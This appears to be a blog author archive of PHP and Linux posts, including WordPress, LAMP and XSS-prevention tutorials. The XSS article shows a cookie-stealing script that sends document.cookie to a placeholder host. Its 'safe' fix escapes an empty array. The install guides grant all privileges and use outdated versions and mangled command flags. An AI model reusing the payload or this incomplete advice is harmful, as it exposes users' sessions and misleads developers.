Author Archive
How to install WordPress in WAMP?
by masterdipesh on Mar.04, 2011, under PHP
Steps for installing wordpress on WAMP are as follows :
1. Go to www.wordpress.org and download the latest zipped version of wordpress.Do not forget to save the file to your computer or harddisk, Download WAMP and install it.
2. Left click on the small wamp icon on your desktop computer and click on phpMyAdmin because we must now create a database in order to install wordpress on our wamp server.
3. Click on privileges and click on add new user. Fill in the following information :
(a) Username = any name that you want
(b) Host = localhost
(c) Password = create your own password
4. Where you see Global Privileges just click on check all and then click go.
5. Click on the home icon within phpMyAdmin and where you see create a database put in a name for your database and click on create. ( The necessary database for installing wordpress has now been fully created ).
6. Extract all files from the downloaded wordpress zip file and navigate on your computer to wamp and the WWW folder and place the unzipped files within this WWW folder.
7. Open up the wordpress folder within the WWW folder and edit the wp-config-sample.php file by
(a) Changing it to wp-config.php and
(b) making the following information within the newly create wp-config.php file :
// ** MySQL settings ** //
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', '');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
(1)DB_NAME = ‘ the name you created for the database within phpMyAdmin ‘
(2) DB_USERNAME = ‘ the name that you created for yourself within phpMyAdmin’
(3) DB_PASSOWRD = ‘ the password that you created for yourself within phpMyAdmin’
(4) DB_HOST = ‘ localhost’ Do not forget to save all the changes to the wp-config.php file.
8. Left click on your small wamp icon again on your desktop and click on localhost.Within YOUR PROJECTS you will see the wordpress folder and just click on it and it will bring up the wordpress installation procedure.
9. Give your blog a name and put in an email address eg info@localhost.com and click on install wordpress.
10. Before you hit the log in button make sure to copy and save the given password because this password has too many characters to remember.
11. Hit log in and fill out the username : admin and just copy the saved password into the password field.
12. Go to users within your wordpress panel and click on edit admin.Scroll down to the password section and create a new simpler password for yourself.
40+ Must-Bookmark PHP Classes & Libraries For Developing Faster
by masterdipesh on Jul.14, 2010, under Development, PHP
PHP, being the most popular scripting language, has lots of documentation, tutorials and resources about itself.
And, as a feature-rich language, it is possible to accomplish many tasks by default from handling e-mails to images, PDFs to database connections, etc.
However, there are high-quality and free PHP classes and libraries which helps you get more like:
- good looking charts
- form validation
- parsing feeds
- better image or database handling
- and more.
Here is a collection 40+ totally free PHP classes and libraries that every PHP developer would love to bookmark:
Content
BackPress
A complete library, that grew from WordPress, which offers the most common tasks for creating web applications like user management, HTTP transactions, logging, formatting and more.
PHP User Class
The class aims to ease the handling of user management tasks like registration, login, logout, etc. for PHP-MySQL applications.
phpSEO
Do you want to automate the process of generating keywords or meta tags from the content? This is what phpSEO does.
It can create any desired number of keywords from a given string or URL, generate a description and does all with not using any banned words you define.
PHP Typography
A PHP class for improving web typography with features like hyphenation, spacing control, wrapping of long text, character replacement for items like ordinal suffixes, trademark or math symbols and more.
Tag Cloud
The class creates tag clouds from a given array of items where each tag can have its own color, URL and style.
Handling Documents
PHPExcel
A set of PHP classes for writing to and reading from different file formats, like Excel, PDF and HTML.
It supports many MS Excel features like adding worksheets to a spreadsheet, inserting data and formulas to cells, calculating formulas and much more.
PHPPowerpoint
Set of classes for reading and writing to Powerpoint documents and supports adding slides, rotating images and more.
TCPDF
A complete PHP PDF class with features like custom page formats or margins, support for images and automatic page header/footer management.
It can also handle document encryption, PDF annotations, bookmarks and table of content.
FPDF
A PDF generator class with flexible page format and margins support. It can automatically arrange page breaks and can insert images into documents.
ZipStream
Compared to many PHP zipping libraries, this class does not require “writable temp directory” and can generate + start the download after the client timeouts (good for huge files).
File Uploads, Images & Colors
EasyUp
A clean and simple PHP file upload class which can also delete the file uploaded and get the size + filename of it
class.upload.php
A PHP class for manipulating and uploading image files on-the-fly.
It can convert, resize and work on uploaded images in many ways: add labels, watermarks and reflections.
Image Resizing Made Easy with PHP
A PHP class which can open, resize (smart resizing with no distortion) and save a number of images in multiple formats.
It is explained very well with a detailed tutorial.
WideImage
A feature-rich PHP library for image manipulations by providing a simple way to loading and saving images from/to files, strings, database, uploads and URL addresses.
You can apply filters, get channels, merge, resize, crop or rotate images using the library.
Asido
A powerful PHP image processor with features like resize, rotate, watermak, frame, convert, rotate, crop and much more.
xColor
An impressive class to make various calculations on colors like converting between formats (HEX,RGB,HSL/HSV), getting the end color when a color is added to or removed from a pallette and more.
PHPMailer
One of the most popular PHP e-mail classes around with features like multiple receivers, embedded images, HTML or plain text, SMTP authentication and much more.
There are also other projects by the same author for form-to-emails, mailing list and bounce management.
Swift Mailer
The library can send emails using SMTP, sendmail, postfix or a custom method.
It supports SMTP authentication, handling attachments and much more. A great thing is, it is extendable with plugins (there are already ones for antiflood, throttling and logging).
Forms
PHP Validation
A set of rules for instantly adding server-side validation to our forms.
The rules include “required, length, e-mail, date, numeric, string and much more. Also, you can add custom regular expressions.
VDaemon
It can check user input by comparing to the rules defined and, if necessary, display errors.
The library has methods like required, e-mail, zip codes, IP address, date, time, integer, string and much more.
Securimage (Captcha)
This PHP captcha class can create complex images or captcha codes and can be easily added into existing forms.
The codes generated can be in custom length, font and use backgrounds. Also, a Flash button can play the mp3 of the image.
Database & Backup
Crystal
This PHP database wrapper offers a human-readable SQL and makes CRUD operations so easy.
It also handles data validation and database manipulation (creating databases, tables, etc.)
ADOdb
A database abstraction library for PHP which supports almost any database (MySQL, PostgreSQL, Interbase, Firebird, Informix, Oracle, MSSQL, Access, SQLite, etc.).
It is fast, supports advanced features like SQL code generation, database-backed sessions and more.
Doctrine
It offers a powerful database abstraction layer with many features for database schema introspection, schema management and PDO abstraction.
Also an object relational mapper (ORM) that sits on top of a powerful database abstraction layer (DBAL) which can write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL) providing developers a powerful alternative to SQL that maintains flexibility without requiring unnecessary code duplication.
ezSQL
This PHP database class makes using popular databases a breeze.ezSQL with detailed debug functions to find outwhat’s going on in your SQL code.
NYT_Transformer
A free PHP class that is developed by the NY Times development team.
It can convert various input types to many other types like Oracle to MySQL or from a database to a flat file.
PHPMYExport (Database Backup)
The class enables users to backup and restore databases (MySQL, PostgreSQL, MSSQL, etc.) from a web-based interface.
BigDump (Staggered MYSQL Database Importer)
Taking backups of large MySQL databases via scripting (like from phpMyAdmin) is usually an issue as backups may not be completed because of the PHP timeout value.
This class backups databases with small portions every time and continues from where it had stopped.
Database CSV Class
It extracts data from a database and generates a .CSV file with it.
The class can be set to prompt you to download the generated file or save it in a folder (or both).
Charts
pChart
A PHP charts class for displaying the data beautifully.
It supports line- bar and pie charts in both 2D and 3D.
JpGraph
An impressive graphing library with support for lots of chart types. It generates web-friendly, small images, can draw 200+ flags with a built-in function and has an internal caching.
Sparkline PHP Graphing Library
Sometimes charts are not what we need and displaying the data within a paragraph, just like a word, works better.
This library exactly does that. Using it, you can create tiny graphics to present your data.
Feeds
SimplePie
It is the ultimate PHP class for fetching, caching, parsing feeds with lots of integrated methods from social bookmarking integration to one-click subscriptions for popular feed services.
Last RSS
A simple yet powerful RSS parser with features like caching, limiting items and date formatting.
Magpie RSS
A modular and bandwidth-friendly (transparent GZIP-encoding) RSS parser with an integrated caching system.
3rd Party Services
Short URL Class
There are many sort URL services and it is possible that you may not want to stick to only one.
This class can shorten URLs with TinyURL, Is.gd, Hex.io, Tr.im & Bit.ly API.
Google Translation PHP wrapper
Google Translate has a limit of translating 5000 words at once. This smart PHP class can translate unlimited numbe of words by splitting the input, sending the queries one-by-one and merging the results at the end.
GAPI – Google Analytics PHP Interface
An easy to use PHP class for getting Google Analytics data.
To view a working demo, check out the tutorial I had published using the class: FeedCount-Like Google Analytics Counter.
PHP Payment Library for Paypal, Authorize.net and 2Checkout (2CO)
If you want to use these providers at the same time in a project, the library offers an API which enables you to handle all providers in the same way.
phpFlickr
It is a PHP wrapper for the Flickr API which returns a friendly array of data to make development easier.
The class has support for uploading photos, getting albums + images inside them and caching.
Twitter with OAuth class
It makes communicating with the Twitter API (using OAuth) easier and supports almost every feature of the API.
PHPWeatherLib
A lightweight weather conditions library that pulls the weather data from the NOAA’s public XML weather feeds.
It can get the temperature (in multiple formats), wind, humidity and an icon for the weather situation.
Others
HTML Purifier
A complete PHP HTML filter library that can remove malicious code (with a whitelist) and also makes sure the documents are standards-compliant.
PHP DNS Query
A set of PHP classes that provides a direct domain name service API.
It offers direct to-server queries, the ability to process the response in detail but still with a simple interface for the developer.
hKit (Microformats Parser)
A simple class for extracting common microformats from a page (currently supports hCard).
XMPPHP
It enables you to connect to any XMPP 1.0 server (like Google Talk), send messages and supports SSL/TLS connections.
Compare Website Speeds: Which Loads Faster?
by masterdipesh on Jul.14, 2010, under Web Gadgets
There are various online and offline tools to find out the loading speeds of websites. And, now, there is a new one with few different features.
Which Loads Faster? is a free and open source web service which enables you to compare the speeds of 2 websites while watching the results live.
You simply mention the URLs of both websites and before submitting the request, it is possible to select:
- whether this will be a parallel or a serial request,
- number of times the test to be repeated
There is also a fun feature named “race” where you can set multiple websites on both sides and they will load one after another (like a flag race).
And, once a test is completed, the service provides you a sharing link where you can send it to friends or bookmark to perform the test regularly.
Website: http://whichloadsfaster.com/
Download: http://github.com/ryanwitt/whichloadsfaster
Open Source Video Conferencing: BigBlueButton
by masterdipesh on Jul.14, 2010, under Linux
BigBlueButton is an open source video conferencing application which is specifically built for remote learning but can be used for standard meetings as well. The application enables multiple users to login & share their webcam or communicate via VOIP at the same time. It is a very ideal application for presentations as users can upload PDF or office documents & keep everyone in sync with their current page, zoom, pan, mouse pointer etc. Also, users can share their desktop with others easily. 
There are 3 user types:
- Presenter: can upload presentations & sharing their desktop
- Viewer: have no authority within the conference, can only view & chat with other users
- Moderator:can upload presentations, share the desktop & change user types of other users.
Users can raise hands to get the attention of the presenter, mute any other participants they want & chat between themselves in public or privately. BigBlueButton completely relies on open source technologies & it can be improved further with the API provided. Requirements: Linux-based Server
Getting started with PHP
by masterdipesh on Jun.12, 2010, under PHP
In this tutorial we will learn the basics of PHP language, capability of php languagehow to install the server for php, MySQL.
Prerequisite of PHP
- Apache Server With PHP support
- MySQL
To install the Apache Server with PHP support and MySQL on Linux, visit my previous blog explaining installation in detail.
http://opensourcelab.info/linux-resource/installing-lamplinux-apache-mysql-php-on-fedora-centos
What is PHP?
PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML.
“Hello World” Example :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Example</title>
</head>
<body>
<?php
echo "Hello World!";
?>
</body>
</html>
Instead of lots of commands to output HTML (as seen in C or Perl), PHP pages contain HTML with embedded code that does(in this case, output “Hello World!”). The PHP code is enclosed in special start and end processing instruction <?php ?> that allow you to jump into and out of “PHP mode.”
What distinguishes PHP from something like client-side JavaScript is that the code is executed on the server, generating HTML which is then sent to the client. The client would receive the results of running that script, but would not know what the underlying code was. You can even configure your web server to process all your HTML files with PHP, and then there’s really no way that users can tell what you have up your sleeve.
The best things in using PHP are that it is extremely simple for a newcomer, but offers many advanced features for a professional programmer.
What can PHP do?
Anything. PHP is mainly focused on server-side scripting, so you can do anything any other CGI program can do, such as collect form data, generate dynamic page content, or send and receive cookies. But PHP can do much more.
There are three main areas where PHP scripts are used.
- Server-side scripting.
This is the most traditional and main target field for PHP. You need three things to make this work. The PHP parser (CGI or server module), a web server and a web browser. You need to run the web server, with a connected PHP installation. You can access the PHP program output with a web browser, viewing the PHP page through the server. All these can run on your home machine if you are just experimenting with PHP programming. - Command line scripting.
You can make a PHP script to run it without any server or browser. You only need the PHP parser to use it this way. This type of usage is ideal for scripts regularly executed using cron (on *nix or Linux) or Task Scheduler (on Windows). These scripts can also be used for simple text processing tasks(Not covered in this post, will be covered in my later post) - Writing desktop applications.
PHP is probably not the very best language to create a desktop application with a graphical user interface, but if you know PHP very well, and would like to use some advanced PHP features in your client-side applications you can also use PHP-GTK to write such programs. You also have the ability to write cross-platform applications this way. PHP-GTK is an extension to PHP, not available in the main distribution. (Not covered in this post)
PHP can be used on all major operating systems, including Linux, many Unix variants (including HP-UX, Solaris and OpenBSD), Microsoft Windows, Mac OS X, RISC OS, and probably others. PHP has also support for most of the web servers today. This includes Apache, Microsoft Internet Information Server, Personal Web Server, Netscape and iPlanet servers, Oreilly Website Pro server, Caudium, Xitami, OmniHTTPd, and many others. For the majority of the servers, PHP has a module, for the others supporting the CGI standard, PHP can work as a CGI processor.
So with PHP, you have the freedom of choosing an operating system and a web server. Furthermore, you also have the choice of using procedural programming or object oriented programming, or a mixture of them. Although not every standard OOP feature is implemented in PHP 4, many code libraries and large applications (including the PEAR library) are written only using OOP code. PHP 5 fixes the OOP related weaknesses of PHP 4, and introduces a complete object model.
With PHP you are not limited to output HTML. PHP’s abilities includes outputting images, PDF files and even Flash movies (using libswf and Ming) generated on the fly. You can also output easily any text, such as XHTML and any other XML file. PHP can autogenerate these files, and save them in the file system, instead of printing it out, forming a server-side cache for your dynamic content.
One of the strongest and most significant features in PHP is its support for a wide range of databases. Writing a database-enabled web page is incredibly simple. The following databases are currently supported:
- Adabas D
- dBase
- Empress
- FilePro (read-only)
- Hyperwave
- IBM DB2
- Informix
- Ingres
- InterBase
- FrontBase
- mSQL
- Direct MS-SQL
- MySQL
- ODBC
- Oracle (OCI7 and OCI8)
- Ovrimos
- PostgreSQL
- SQLite
- Solid
- Sybase
- Velocis
- Unix dbm
PHP also have a database abstraction extension (named PDO) allowing you to transparently use any database supported by that extension. Additionally PHP supports ODBC, the Open Database Connection standard, so you can connect to any other database supporting this world standard.
PHP also has support for talking to other services using protocols such as LDAP, IMAP, SNMP, NNTP, POP3, HTTP, COM (on Windows) and countless others. You can also open raw network sockets and interact using any other protocol.
PHP has support for the WDDX complex data exchange between virtually all Web programming languages. Talking about interconnection, PHP has support for instantiation of Java objects and using them transparently as PHP objects. You can also use our CORBA extension to access remote objects.
PHP has extremely useful text processing features, from the POSIX Extended or Perl regular expressions to parsing XML documents.
For parsing and accessing XML documents, PHP 4 supports the SAX and DOM standards, and you can also use the XSLT extension to transform XML documents. PHP 5 standardizes all the XML extensions on the solid base of libxml2 and extends the feature set adding SimpleXML and XMLReader support.
At last but not least, we have many other interesting extensions, the mnoGoSearch search engine functions, the IRC Gateway functions, many compression utilities (gzip, bz2, zip), calendar conversion, translation and the features of PHP are end less.
Now we will start with the simple example
Step 1 : Create a file name helloworld.php in the DOCUMENT_ROOT of your server.
For linux generally it is “/var/www/html” and for windows if WAMP is installed then it is “c:\wamp\www\”
Step 2 : Copy the following content to newly created file.
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<h1>My First PHP Application</h1>
<?php echo ‘<h1>Hello World!!!!!</h1>’; ?>
</body>
</html>
Step 3 : Run the newly created file. Type “http://localhost/helloworld.php” in the web browser. And if every thing goes fine then following output will be shown which renders the page.
“Further tutorial will be posted soon. so keep visting.”
Powerful jQuery Image Zoomer: Cloud Zoom
by masterdipesh on Jun.09, 2010, under JavaScript, jQuery
Cloud Zoom is a lightweight (6kb) jQuery image zoom plugin that comes with impressive features.
The plugin is unobtrusive and displays the zoomed version of the images:
- near the thumbnail image
- inside the thumbnail image (inner zoom)
when hovered.
It works in a “gallery mode” by default which automatically display a list images, shows the clicked one and can zoom to that image. This is very useful specially for product showcases (like in e-commerce websites).
The smoothness of the zoom effect, tint over the thumbnail or lens opacity can be totally customized and the plugin can be styled via CSS.
Compatibility: All Major Browsers
Website: http://www.professorcloud.com/mainsite/cloud-zoom.htm
License : MIT License
Free Flash Media Server Alternatives
by masterdipesh on Jun.09, 2010, under Flex, Video Streaming
Today, many projects are built around real-time communication (text, voice or video) like collaboration tools, chat applications and much more.
Adobe® Flash® Media Server is probably the most widely used solution for streaming video and real-time communication. It is a stable product that has been experienced for years and used by many companies.
On the other hand, if you’re looking for a free solution to stream your media, there are so few alternatives that you can rely on.
And here are 2 of them (if you know any other free and solid ones, please share):
Red5
Red5 is an open source Flash server that is written in Java and supports:
- streaming audio/video (FLV, MP3, F4V, MP4, AAC, M4A)
- recording client streams (FLV only)
- shared objects
- live stream publishing (Sorenson, VP6, h.264, MP3, AAC and more)
It has installers for OSX and Windows. Also, it can be downloaded as a zip file to be used in any OS.
Mammoth Server
Mammoth is also an open source Flash streaming server that is built with C++ and can run on Windows and *nix OSs.
It can stream all Flash codecs like h263, h264, mp3, vp6, speex, nellymoser, etc.
By using FFmpeg it has has container support for most formats: mov, flv, mkv, mp3 and more.
The server is still in alpha phase but very promising.
If you know any other free and solid alternatives, please share and we’ll be happy to add them to the list.
Preventing cross-site scripting (XSS) vulnerabilities in PHP
by masterdipesh on Jun.09, 2010, under Secure Coding Practice
Being highly flexible in building dynamic, database-driven web applications makes the PHP programming language one of the most popular web development tools in use today. It also works beautifully with other open source tools, such as the MySQL database and the Apache web server. However, as more web sites are developed in PHP, they become targets for malicious attackers, and developers need to prepare for the attacks.
Security is an issue that demands attention, given the growing frequency of attacks on web sites.
There are many kind of potential attacks, but in this article i will be covering only about the (Cross-site scripting) XSS and preventing XSS.
When developing a typical PHP application, the bulk of your logic involves data processingtasks such as determining whether a user has logged in successfully, adding items to a shopping cart, and processing a credit card transaction.
Data can come from numerous sources, and as a security-conscious developer, you want to be able to easily and reliably distinguish between two distinct types of data:
- Filtered data
- Unfiltered data
Anything that is created by you is trustworthy and can be considered filtered.
e.g.
$email = 'test@test.com';
Unfiltered data is anything that is not guaranteed to be valid, such as form data submitted by the user,email retrieved from an IMAP server, or an XML document sent from another web application
e.g. $email = $_GET['email'];
Although a user can send data in multiple ways, most applications take the most important actions as the result of a form submission.
A user can send data to your application in three predominant ways:
- In the URL (e.g., GET data)
- In the content of a request (e.g., POST data)
- In an HTTP header (e.g., Cookie)
Cross-site scripting (XSS) is deservedly one of the best known types of attacks.
Any application that displays input is at riskweb-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some type this is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.
Consider a web application that allows users to create new post on each page.
<form action="post.php" method="POST" />
<p>Name: <input type="text" name="title" /><br />
Comment: <textarea name="post" rows="10" cols="60"></textarea><br />
<input type="submit" value="Add Post" /></p>
</form>
The application displays post to other users who visit the page. For example, code similar to the following can be used to output a single post ($post) and corresponding title ($title):
<?php
echo "<p>$title<br />";
echo "<blockquote>$post</blockquote></p>";
?>
This approach places a significant amount of trust in the values of both $post and $title. Imagine that one of them contained the following:
<script>
document.location ='http://example.org/steal.php?cookies=' +document.cookie
</script>
If this post is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies'].
This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output unfiltered, unescaped data, you can simply make sure that you filter input and escape output.
At the very least, you should use htmlentities( ) to escape any data that you send to the client this function converts all special characters into their HTML entity equivalents. Thus, any character that the browser interprets in a special way is converted to its HTML entity equivalent so that its original value is preserved.
The following replacement for the code to display a comment is a much safer approach:
<?php
$clean = array();
$html = array();
$html['title'] = htmlentities($clean['title'], ENT_QUOTES, 'UTF-8');
$html['post'] = htmlentities($clean['post'], ENT_QUOTES, 'UTF-8');
echo "<p>{$html['title']}<br />";
echo "<blockquote>{$html['post']}</blockquote></p>";
?>
Installing LAMP(Linux Apache MySQL PHP) on Fedora & CentOS
by masterdipesh on Jun.02, 2010, under Linux
This document will walk you through the installation of what is known as a “LAMP” system: Linux, Apache, MySQL and PHP. Depending on who you talk to, the P also stands for Perl or Python, but in general, it is assumed to be PHP. I run CentOS on my servers; these directions were written for CentOS/Red Hat/Fedora.
If you are not comfortable with trying this procedure yourself, I am available for hire to install LAMP systems, or assist you with any other Linux-based projects.
I designed this document so you can just copy/paste each line or block of commands into your shell session and it will “just work” for you. This avoids tedious typing, and the inevitable typos or missed steps that result. These commands work properly via copy/paste. If you are having problems and you are not using copy/paste, please re-check your typing before sending me an email saying “It doesn’t work.”
Text in a “command” box like this one is a literal Linux commandline, and should be typed or pasted exactly as written.
One note: many many people have followed these directions as written, and have not had any problems.
If you are having a problem, chances are it’s something you are doing (or not doing), something different
about your computer, etc.
It is probably NOT this procedure. 
Initial Steps
PLEASE BE AWARE THAT A SOURCE-BASED INSTALLATION LIKE THIS ONE IS NOT NEEDED FOR A BASIC LAMP SERVER! You should only be doing a source-based installation if you need to alter settings in one or more components of the LAMP stack (e.g., you need a feature in PHP that isn’t in the default RPM). If you are just getting started with LAMP, use the binaries provided by your distribution – it is much simpler, and a lot easier to upgrade later.
Most out-of-the-box Red Hat Linux installations will have one or more of the LAMP components installed via RPM files. I personally believe in installing things like this from source, so I get the most control over what’s compiled in, what’s left out, etc. But source code installs can wreak havoc if overlaid on top of RPM installs, as the two most likely won’t share the same directories, etc.
If you have not yet installed your Linux OS, or just for future reference, do not choose to install Apache, PHP, or MySQL during the system installation. Then you can immediately proceed with the source-based install listed here.
Note: to install applications from source code, you will need a C++ compiler (gcc++) installed. This is generally taken care of, but I’ve had enough queries about it that I’ve added this note to avoid getting more! You can use your distribution’s install CDs to get the proper version of the compiler. Or, if you are using an RPM based distro, you can use a site like http://www.rpmfind.net/ to locate the correct RPM version for your system. (You will obviously not be able to use/rebuild a source RPM to get the compiler installed, as you need the compiler to build the final binary RPM!) On a Fedora system, you can do this command:
su – root
yum install gcc gcc-c++
Log in as root
Because we will be installing software to directories that “regular” users don’t have write access to, and also possibly uninstalling RPM versions of some applications, we’ll log in as root. The only steps that need root access are the actual installation steps, but by doing the configure and make steps as root, the source code will also be inaccessible to “regular” users.
If you do not have direct access (via keyboard) to the server, PLEASE use Secure Shell (SSH) to access the server and not telnet!! Whenever you use telnet (or plain FTP for that matter), you are transmitting your username, password, and all session information in “plain text”. This means that anyone who can access a machine someplace between your PC and your server can snoop your session and get your info. Use encryption wherever possible!
su – root
Remove RPM Versions of the Applications
Before we start with our source code install, we need to remove all the existing RPM files for these products. To find out what RPMs are already installed, use the RPM query command:
rpm -qa
in conjunction with grep to filter your results:
rpm -qa | grep -i apache
rpm -qa | grep -i httpd
rpm -qa | grep -i php
rpm -qa | grep -i mysql
The ‘httpd’ search is in case you have Apache2 installed via RPM.
To remove the RPMs generated by these commands, do
rpm -e filename
for each RPM you found in the query. If you have any content in your MySQL database already, the RPM removal step should not delete the database files. When you reinstall MySQL, you should be able to move all those files to your new MySQL data directory and have access to them all again.
Get the Source Code for all Applications
We want to put all our source code someplace central, so it’s not getting mixed up in someone’s home directory, etc.
cd /usr/local/src
One way application source code is distributed is in what are known as “tarballs.” The tar command is usually associated with making tape backups – tar stands for Tape ARchive. It’s also a handy way to pack up multiple files for easy distribution. Use the man tar command to learn more about how to use this very flexible tool.
At the time of updating this, the current versions of all the components we’ll use are:
MySQL – 4.0.26 (MySQL v4.1.x coming soon; there are tricky locale issues)
Apache – 1.3.34
PHP – 4.4.2
Please note: these are the only versions of these that I have set up myself, and verified these steps against. If you use another version of any component, especially a newer version, this HOWTO may not be accurate, and I won’t be able to provide free support under those circumstances. Paid support and assistance is always available however.
wget http://www.php.net/distributions/php-4.4.2.tar.gz
wget http://apache.oregonstate.edu/httpd/apache_1.3.34.tar.gz
There may be an Apache mirror closer to you – check their mirror page for other sources. Then insert the URL you get in place of the above for the wget command.
For MySQL, go to http://www.mysql.com/ and choose an appropriate mirror to get the newest MySQL version (v4.0.26).
Unpack the Source Code
tar zxf php-4.4.2.tar.gz
tar zxf apache_1.3.34.tar.gz
tar zxf mysql-4.0.26.tar.gz
This should leave you with the following directories:
/usr/local/src/php-4.4.2
/usr/local/src/apache_1.3.34
/usr/local/src/mysql-4.0.26
Build and Install MySQL
First, we create the group and user that “owns” MySQL. For security purposes, we don’t want MySQL running as root on the system. To be able to easily identify MySQL processes in top or a ps list, we’ll make a user and group named mysql:
groupadd mysql
useradd -g mysql -c “MySQL Server” mysql
If you get any messages about the group or user already existing, that’s fine. The goal is just to make sure we have them on the system.
What the useradd command is doing is creating a user mysql in the group mysql with the “name” of MySQL Server. This way when it’s showed in various user and process watching apps, you’ll be able to tell what it is right away.
<!–You may ask – doesn’t the MySQL user need to log in? The answer to that is actually no. When MySQL is started, a controlling process owned by root is started (via the safe_mysqld script). Then child processes, owned by mysql are spawned from it. The parent controlling process watches the child processes and restarts them automatically if they get killed off, etc.
–>Now we’ll change to the “working” directory where the source code is, change the file ‘ownership’ for the source tree (this prevents build issues in reported in some cases where the packager’s username was included on the source and you aren’t using the exact same name to compile with!) and start building.
The configure command has many options you can specify. I have listed some fairly common ones; if you’d like to see others, do:
./configure –help | less
to see them all. Read the documentation on the MySQL website for a more detailed explanation of each option.
cd /usr/local/src/mysql-4.0.26
chown -R root.root *
make clean
./configure \
–prefix=/usr/local/mysql \
–localstatedir=/usr/local/mysql/data \
–disable-maintainer-mode \
–with-mysqld-user=mysql \
–with-unix-socket-path=/tmp/mysql.sock \
–without-comment \
–without-debug \
–without-bench
18-Jul-2005: If you are installing MySQL 4.0.x on Fedora Core 4, there is a problem with LinuxThreads that prevents MySQL from compiling properly. Installing on Fedora Core 3 works fine though. Thanks to Kevin Spencer for bringing this to my attention. There is a workaround listed at http://bugs.mysql.com/bug.php?id=9497. Thanks to Collin Campbell for that link. Another solution can be found at http://bugs.mysql.com/bug.php?id=2173. Thanks to Kaloyan Raev for that one.
Now comes the long part, where the source code is actually compiled and then installed. Plan to get some coffee or take a break while this step runs. It could be 10-15 minutes or more, depending on your system’s free memory, load average, etc.
make && make install
Configure MySQL
MySQL is “installed” but we have a few more steps until it’s actually “done” and ready to start. First run the script which actually sets up MySQL’s internal database (named, oddly enough, mysql).
./scripts/mysql_install_db
Then we want to set the proper ownership for the MySQL directories and data files, so that only MySQL (and root) can do anything with them.
chown -R root:mysql /usr/local/mysql
chown -R mysql:mysql /usr/local/mysql/data
Copy the default configuration file for the expected size of the database (small, medium, large, huge)
cp support-files/my-medium.cnf /etc/my.cnf
chown root:sys /etc/my.cnf
chmod 644 /etc/my.cnf
If you get an error message about the data directory not existing, etc., something went wrong in the mysql_install_db step above. Go back and review that; make sure you didn’t get some sort of error message when you ran it, etc.
Now we have to tell the system where to find some of the dynamic libraries that MySQL will need to run. We use dynamic libraries instead of static to keep the memory usage of the MySQL program itself to a minimum.
echo “/usr/local/mysql/lib/mysql” >> /etc/ld.so.conf
ldconfig
Now create a startup script, which enables MySQL auto-start each time your server is restarted.
cp ./support-files/mysql.server /etc/rc.d/init.d/mysql
chmod +x /etc/rc.d/init.d/mysql
/sbin/chkconfig –level 3 mysql on
Then set up symlinks for all the MySQL binaries, so they can be run from anyplace without having to include/specify long paths, etc.
cd /usr/local/mysql/bin
for file in *; do ln -s /usr/local/mysql/bin/$file /usr/bin/$file; done
MySQL Security Issues
First, we will assume that only applications on the same server will be allowed to access the database (i.e., not a program running on a physically separate server). So we’ll tell MySQL not to even listen on port 3306 for TCP connections like it does by default.
Edit /etc/my.cnf and uncomment the
skip-networking
line (delete the leading #).
For more security info, check this great tutorial over at SecurityFocus.
Start MySQL
First, test the linked copy of the startup script in the normal server runlevel start directory, to make sure the symlink was properly set up:
cd ~
/etc/rc.d/rc3.d/S90mysql start
If you ever want to manually start or stop the MySQL server, use these commands:
/etc/rc.d/init.d/mysql start
/etc/rc.d/init.d/mysql stop
Let’s “test” the install to see what version of MySQL we’re running now:
mysqladmin version
It should answer back with the version we’ve just installed…
Now we’ll set a password for the MySQL root user (note that the MySQL root user is not the same as the system root user, and definitely should not have the same password as the system root user!).
mysqladmin -u root password new-password
(obviously, insert your own password in the above command instead of the “new-password” string!)
You’re done! MySQL is now installed and running on your server. It is highly recommended that you read about MySQL security and lock down your server as much as possible. The MySQL site has info at http://www.mysql.com/doc/en/Privilege_system.html.
Test MySQL
To run a quick test, use the command line program mysql:
mysql -u root -p
and enter your new root user password when prompted. You will then see the MySQL prompt:
mysql>
First, while we’re in here, we’ll take care of another security issue and delete the sample database test and all default accounts except for the MySQL root user. Enter each of these lines at the mysql> prompt:
drop database test;
use mysql;
delete from db;
delete from user where not (host=”localhost” and user=”root”);
flush privileges;
As another security measure, I like to change the MySQL administrator account name from root to something harder to guess. This will make it that much harder for someone who gains shell access to your server to take control of MySQL.
MAKE SURE YOU REMEMBER THIS NEW NAME, AND USE IT WHEREVER
YOU SEE “root” IN OTHER DIRECTIONS, WEBSITES, ETC.
ONCE YOU DO THIS STEP, THE USERNAME “root” WILL CEASE TO
EXIST IN YOUR MYSQL CONFIGURATION!
update user set user=”sqladmin” where user=”root”;
flush privileges;
Now, on with the “standard” testing… First, create a new database:
create database foo;
You should see the result:
Query OK, 1 row affected (0.04 sec)
mysql>
Delete the database:
drop database foo;
You should see the result:
Query OK, 0 rows affected (0.06 sec)
mysql>
To exit from mysql enter \q:
\q
Build and Install Apache (with DSO support)
The advantage to building Apache with support for dynamically loaded modules is that in the future, you can add functionality to your webserver by just compiling and installing modules, and restarting the webserver. If the features were compiled into Apache, you would need to rebuild Apache from scratch every time you wanted to add or update a module (like PHP). Your Apache binary is also smaller, which means more efficient memory usage.
The downside to dynamic modules is a slight performance hit compared to having the modules compiled in.
cd /usr/local/src/apache_1.3.34
make clean
./configure \
–prefix=/usr/local/apache \
–enable-shared=max \
–enable-module=rewrite \
–enable-module=so
make && make install
Build and Install PHP
This section has only been tested with PHP v4.x. If you are trying to build PHP 5.x, I do not have experience with this yet, and do not provide free support for you to get it working. Please note that there are many options which can be selected when compiling PHP. Some will have library dependencies, meaning certain software may need to be already installed on your server before you start building PHP. You can use the command
./configure –help | less
once you change into the PHP source directory. This will show you a list of all possible configuration switches. For more information on what these switches are, please check the PHP website documentation.
